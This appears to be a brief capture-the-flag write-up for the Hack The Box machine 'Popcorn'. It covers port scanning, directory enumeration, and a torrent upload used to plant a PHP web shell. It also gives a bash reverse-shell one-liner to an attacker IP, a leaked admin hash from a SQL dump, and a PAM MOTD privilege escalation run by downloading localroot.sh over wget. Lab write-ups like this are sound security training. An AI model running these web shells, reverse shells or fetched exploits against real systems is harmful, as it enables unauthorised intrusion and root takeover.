Popcorn

Port Scan

$ sudo nmap 10.129.20.243 -p- --min-rate=10000 -T4 -sCV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12
|_http-title: Did not follow redirect to http://popcorn.htb/
|_http-server-header: Apache/2.2.12 (Ubuntu)
Service Info: Host: popcorn.hackthebox.gr; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web APP

echo 10.129.20.243 popcorn.htb | sudo tee -a /etc/hosts

$ feroxbuster -u http://popcorn.htb/ -w /usr/share/seclists/Discovery/Web-Content/common.txt --threads=50 -k -C 404

301      GET        9l       28w      312c http://popcorn.htb/torrent => http://popcorn.htb/torrent/
200      GET      656l     3113w    47460c http://popcorn.htb/test.php
200      GET      658l     3123w    47575c http://popcorn.htb/test
301      GET        9l       28w      318c http://popcorn.htb/torrent/admin => http://popcorn.htb/torrent/admin/
200      GET      106l      206w     2988c http://popcorn.htb/torrent/admin/admin

http://popcorn.htb/torrent/login.php

http://popcorn.htb/torrent/torrents.php?mode=upload

alt text

Went to kali offical website and download a torrent file. Then, upload it to the website.

alt text

<?php system($_GET[x]); ?>

alt text

# url encode
bash -c 'bash -i >& /dev/tcp/10.10.14.215/4445 0>&1'

alt text

George

# /var/www/torrent/database/th_database.sql
INSERT INTO `users` VALUES (3, 'Admin', '1844156d4166d94387f1a4ad031ca5fa', 'admin', 'admin@yourdomain.com', '2007-01-06 21:12:46', '2007-01-06 21:12:46');

alt text

motd.legal-displayed

alt text

Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)

$ wget http://10.10.14.215/localroot.sh -O test.sh

$ python -c "import pty;pty.spawn('/bin/bash');"

$ bash test.sh

alt text